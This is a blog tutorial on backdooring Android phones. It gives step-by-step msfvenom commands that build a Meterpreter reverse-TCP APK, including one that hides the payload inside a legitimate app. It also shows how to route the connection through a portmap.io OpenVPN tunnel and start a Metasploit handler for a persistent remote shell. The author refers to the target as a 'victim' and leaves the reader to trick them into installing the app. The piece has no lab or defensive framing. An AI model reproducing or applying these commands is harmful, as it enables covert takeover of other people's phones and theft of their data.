Hacking Android over WAN And Using Portmap.io to sustain the Backdoor
Hey guys,
In this blog, we are going to see how to hack an android device using a backdoor apk, so that we may gain access to it anytime.
Note: You should have the victim install a malicious App, I may only teach what to do before and after installation. It is up to your intelligence to make the victim install the App.
Ok first, Let me explain what we are going to do.
Normally on a LAN, we create a Malicious file, have it executed on a machine in our Local Network. We may use the Private IP to return connections to, But on WAN that doesn’t work and you should do port forwarding, so that on a Public IP on a specific port if a connection is recieved, it is redirected to you on your local port.
We are going to use a public VPN, to get traffic routed to our device.
So you would require
Metasploit Framework
OpenVPN
If you don’t understand that, just leave it and lets get our hands dirty.
Since both tools mentioned are available for most platforms, so it works in almost all platforms, even in android in Termux.
We are going to use a free public service called portmap.io and yeah definitely as you thought, free and public definitely has some limitations.
First create an account here
www.portmap.io/register
Then Login to your account in
www.portmap.io/login
After Logging In, go to the configurations in the top navigation bar,
Next, click on the Create New Configuration button,
Next, it asks for some details fill in as
Name - Anything you may wish
Type - OpenVPN
Proto - TCP
Comment - Just for your reference
Click on the Generate button.
After generating the Config file, Download it to your machine.
It is the file that is going to give access to a public VPN service.
Then Click on Create to create the configuration.
Next we have to Create Mapping Rules, Click on the Mapping Rules in the Navigation bar.
This is the rule which says like, Ah! packet for cyberraw69, get this packet to him in port <port you forwarded>.
Then click on Create a New Rule.
Again, it asks for some important details, fill these in carefully
Configuration - Its default limited for free accounts.
Protocol - TCP
Hostname - <your username> portmap.io / portmap.host (anything you wish)
port on portmap - Its unchangeable
Port on PC - Anything you wish, remember this port well, you need it when you run the payload handler.
Allowed IP - Optional, (Like a firewall)
Then Click on Create to create to the rule.
Aaah, If you followed everything as mentioned, the work with the browser is over and you may close it, if you could remember what is in the
above screenshot.
Now we are going to act like a hacker, open the terminal :)
Navigate to where you downloaded the configuration file.(The first step)
cd Downloads
ls
Then run openvpn using that configuration file
sudo openvpn --config mrfucker755.cyberraw69.ovpn
It gets stuck saying Initialization Sequence Completed
It means that so far you did everything correctly, Good Job man, read on.
Donot Close this screen, this routes the traffic from portmap.io to you. So just minimize it and open another terminal.
Now we are going to generate the malicious apk file, using msfvenom as
msfvenom -p android/meterpreter/reverse_tcp LHOST=mrfucker755-47939.portmap.host LPORT=47939 R > Backdoor.apk
Do you recognize the LHOST? its the one from the Mapping Rules Page. Type in if you remember, else look back.
You can also embed the payload to a legit apk, using the -x option.
msfvenom -p android/meterpreter/reverse_tcp -x <legit app> LHOST=mrfucker755-47939.portmap.host LPORT=47939 -o Backdoor.apk
This doesn’t work on all legit apps because of secure coding practices.
Now Start the metasploit framework,
msfconsole
Set the necessary options as,
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <tun0-IP>
set LPORT <Port you gave in mapping rules>
To get the IP address,
ifconfig tun0
Put in your IP as LHOST. At last, everything is set. Now you may run the exploit. For the LPORT, it should be same as the one in Mapping rule, Port on your PC. If the port is below 1024, you would need to be root, so better stick with default 4444 or use 8080
run
Now the handler will be started and waiting for connections.
Now its your time, Install the app in Victim’s device and After installing you may find the App as MainActivity. Double tap the Application. When you double tap it, you would see connections coming to your device.
And congrats !!, you popped a shell on that device.
To view all the commands, type in
help
You may run any of the commands listed, if you have any error running a command, you may close the existing session and open a new one.(just press Ctrl+C in Meterpreter session and Double tap the app once more)
There are other port forwarding services too that are free, two things I know are
ngrok
serveo
Ngrok is good for static things like running a website. But in this, when you terminate ngrok, you have to redo the whole process. Because, PORT changes everytime when you run ngrok.
Serveo is good and it doesn’t even need an account to use. It is somewhat similar to this portmap.io. It uses something different called SSH Forwarding. I plan to write about in future. So stay tuned.
The advantage of this is when you get something like
Meterpreter Session Closed — Reason died
You donot need to redo everything, you just double tap the apk. This app would route connections to you always, until you have the OpenVPN and Msf Handler running.
So thats it, thanks for reading, hope you Learned something.
If you have problems, please watch this video,
https://www.youtube.com/watch?v=9bqt5QA48Z4
If you want to know whats happening behind the scenes message me at twitter @n00bie4